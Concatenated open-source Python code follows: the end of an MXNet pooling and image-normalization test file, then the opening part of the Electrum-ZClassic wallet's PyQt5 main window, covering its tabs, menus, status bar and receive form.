input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
@with_seed()
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@with_seed()
def test_image_normalize():
# Part 1 - Test 3D Input
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D Input
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
if __name__ == '__main__':
import nose
nose.runmodule()
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight ZClassic client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
from PyQt5.QtGui import *
from PyQt5.QtCore import *
import PyQt5.QtCore as QtCore
from .exception_window import Exception_Hook
from PyQt5.QtWidgets import *
from electrum_zclassic import keystore, simple_config
from electrum_zclassic.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_zclassic import constants
from electrum_zclassic.plugins import run_hook
from electrum_zclassic.i18n import _
from electrum_zclassic.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword)
from electrum_zclassic import Transaction
from electrum_zclassic import util, bitcoin, commands, coinchooser
from electrum_zclassic import paymentrequest
from electrum_zclassic.wallet import Multisig_Wallet, AddTransactionException
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electrum_zclassic.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
notify_transactions_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self._old_excepthook = None
self.setup_exception_hook()
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.is_max = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tx_notifications = []
self.tl_windows = []
self.tx_external_keypairs = {}
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.num_zeros = int(config.get('num_zeros', 8))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum-zclassic.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.notify_transactions_signal.connect(self.notify_transactions)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['updated', 'new_transaction', 'status',
'banner', 'verified', 'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
self.connect_slots(gui_object.timer)
self.fetch_alias()
def on_history(self, b):
self.new_fx_history_signal.emit()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide") if show else _("Show")) + " " + tab.tab_description
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self),
self.wallet.basename() if self.wallet else "None")
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
if event == 'updated':
self.need_update.set()
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
elif event == 'new_transaction':
self.tx_notifications.append(args[0])
self.notify_transactions_signal.emit()
elif event in ['status', 'banner', 'verified', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
self.history_list.update_item(*args)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.do_update_fee()
# todo: update only unconfirmed tx
self.history_list.update()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.wallet = wallet
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
self.notify_transactions()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-Zclassic Testnet" if constants.net.TESTNET else "Electrum-Zclassic"
title = '%s %s - %s' % (name, self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Zclassic coins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Zclassic coins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum-Zclassic was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.config.get_wallet_path()))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
i = 1
while True:
filename = "wallet_%d" % i
if filename in os.listdir(wallet_folder):
i += 1
else:
break
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in macOS using this as work around
tools_menu.addAction(_("Electrum-Zclassic preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self))
tools_menu.addAction(_("&Plugins"), self.plugins_dialog)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
#help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://github.com/ZClassicCommunity/electrum-zclassic"))
help_menu.addSeparator()
#help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://github.com/ZClassicCommunity/electrum-zclassic")).setShortcut(QKeySequence.HelpContents)
#self._auto_crash_reports = QAction(_("&Automated Crash Reports"), self, checkable=True)
#self._auto_crash_reports.setChecked(self.config.get("show_crash_reporter", default=False))
#self._auto_crash_reports.triggered.connect(self.auto_crash_reports)
#help_menu.addAction(self._auto_crash_reports)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
self.setMenuBar(menubar)
def auto_crash_reports(self, state):
self.config.set_key("show_crash_reporter", state)
self.setup_exception_hook()
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
self.pay_to_URI('zclassic:%s?message=donation for %s'%(d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electrum-Zclassic",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electrum-Zclassic focus is speed, with low resource usage and simplifying ZClassic. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the ZClassic system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/ZClassicCommunity/electrum-zclassic/issues\">https://github.com/ZClassicCommunity/electrum-zclassic/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electrum-Zclassic (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electrum-Zclassic - " + _("Reporting Bugs"))
def notify_transactions(self):
if not self.network or not self.network.is_connected():
return
self.print_error("Notifying GUI")
if len(self.tx_notifications) > 0:
# Combine the transactions if there are at least three
num_txns = len(self.tx_notifications)
if num_txns >= 3:
total_amount = 0
for tx in self.tx_notifications:
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
total_amount += v
self.notify(_("{} new transactions received: Total amount received in the new transactions {}")
.format(num_txns, self.format_amount_and_units(total_amount)))
self.tx_notifications = []
else:
for tx in self.tx_notifications:
if tx:
self.tx_notifications.remove(tx)
is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx)
if v > 0:
self.notify(_("New transaction received: {}").format(self.format_amount_and_units(v)))
def notify(self, message):
if self.tray:
try:
# this requires Qt 5.9
self.tray.showMessage("Electrum-Zclassic", message, QIcon(":icons/electrum_dark_icon"), 20000)
except TypeError:
self.tray.showMessage("Electrum-Zclassic", message, QSystemTrayIcon.Information, 20000)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(self, title, filename, filter = ""):
directory = self.config.get('io_dir', os.path.expanduser('~'))
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter)
if fileName and directory != os.path.dirname(fileName):
self.config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def connect_slots(self, sender):
sender.timer_signal.connect(self.timer_actions)
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self.need_update.clear()
self.update_wallet()
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, is_diff, self.num_zeros, self.decimal_point, whitespaces)
def format_amount_and_units(self, amount):
text = self.format_amount(amount) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount) if self.fx else None
if text and x:
text += ' (%s)'%x
return text
def format_fee_rate(self, fee_rate):
return '%s sat/kB' % round(fee_rate)
def get_decimal_point(self):
return self.decimal_point
def base_unit(self):
assert self.decimal_point in [2, 5, 8]
if self.decimal_point == 2:
return 'uZCL'
if self.decimal_point == 5:
return 'mZCL'
if self.decimal_point == 8:
return 'ZCL'
raise Exception('Unknown base unit')
def connect_fields(self, window, btc_e, fiat_e, fee_e):
def edit_changed(edit):
if edit.follows:
return
edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
fiat_e.is_last_edited = (edit == fiat_e)
amount = edit.get_amount()
rate = self.fx.exchange_rate() if self.fx else Decimal('NaN')
if rate.is_nan() or amount is None:
if edit is fiat_e:
btc_e.setText("")
if fee_e:
fee_e.setText("")
else:
fiat_e.setText("")
else:
if edit is fiat_e:
btc_e.follows = True
btc_e.setAmount(int(amount / Decimal(rate) * COIN))
btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
btc_e.follows = False
if fee_e:
window.update_fee()
else:
fiat_e.follows = True
fiat_e.setText(self.fx.ccy_amount_str(
amount * Decimal(rate) / COIN, False))
fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet())
fiat_e.follows = False
btc_e.follows = False
fiat_e.follows = False
fiat_e.textChanged.connect(partial(edit_changed, fiat_e))
btc_e.textChanged.connect(partial(edit_changed, btc_e))
fiat_e.is_last_edited = False
def update_status(self):
if not self.wallet:
return
if self.network is None or not self.network.is_running():
text = _("Offline")
icon = QIcon(":icons/status_disconnected.png")
elif self.network.is_connected():
server_height = self.network.get_server_height()
server_lag = self.network.get_local_height() - server_height
# Server height can be 0 after switching to a new server
# until we get a headers subscription request response.
# Display the synchronizing message in that case.
if not self.wallet.up_to_date or server_height == 0:
text = _("Synchronizing...")
icon = QIcon(":icons/status_waiting.png")
elif server_lag > 1:
text = _("Server is lagging ({} blocks)").format(server_lag)
icon = QIcon(":icons/status_lagging.png")
else:
c, u, x = self.wallet.get_balance()
text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c))
if u:
text += " [%s unconfirmed]"%(self.format_amount(u, True).strip())
if x:
text += " [%s unmatured]"%(self.format_amount(x, True).strip())
# append fiat balance and price
if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = QIcon(":icons/status_connected.png")
else:
icon = QIcon(":icons/status_connected_proxy.png")
else:
text = _("Not connected")
icon = QIcon(":icons/status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
self.status_button.setIcon( icon )
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self):
self.history_list.update()
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.update_completions()
def create_history_tab(self):
from .history_list import HistoryList
self.history_list = l = HistoryList(self)
l.searchable_list = l
l.setObjectName("history_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = self.config.get('show_toolbar_history', False)
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_transaction(self, tx, tx_desc = None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, self, tx_desc)
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_address_e = ButtonsLineEdit()
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
msg = _('Zclassic address where the payment should be received. Note that each payment request uses a different Zclassic address.')
self.receive_address_label = HelpLabel(_('Receiving address'), msg)
self.receive_address_e.textChanged.connect(self.update_receive_qr)
self.receive_address_e.setFocusPolicy(Qt.ClickFocus)
grid.addWidget(self.receive_address_label, 0, 0)
grid.addWidget(self.receive_address_e, 0, 1, 1, -1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 1, 0)
grid.addWidget(self.receive_message_e, 1, 1, 1, -1)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 2, 0)
grid.addWidget(self.receive_amount_e, 2, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
